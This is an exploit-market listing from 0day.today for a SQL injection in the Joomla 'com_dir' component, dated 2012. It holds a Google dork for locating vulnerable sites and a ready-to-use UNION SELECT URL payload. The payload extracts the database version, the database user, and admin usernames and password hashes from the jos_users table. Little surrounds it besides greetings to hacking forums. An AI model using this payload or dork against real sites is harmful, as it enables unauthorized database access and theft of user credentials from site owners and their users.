[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla "com_dir" component SQL Injection

Author
Ereee
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-17507
Category
web applications
Date add
15-01-2012
Platform
php
# Exploit Title: Joomla "com_dir" component SQL Injection
# Date: 15.01.2012
# Author: Ereee
# Version: all
# Category:: [remote, webapps]
# Google dork: inurl:"?option=com_dir"
# Tested in: web


http://localhost/[PATH]/index.php?option=com_dir&task=show&id=-1+union+select+1,version(),3,database(),user(),concat(username,0x3a,password),7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+limit+0,1--+f


Greetz to : forum.antichat.ru&rdot.org members 



#  0day.today [2024-12-24]  #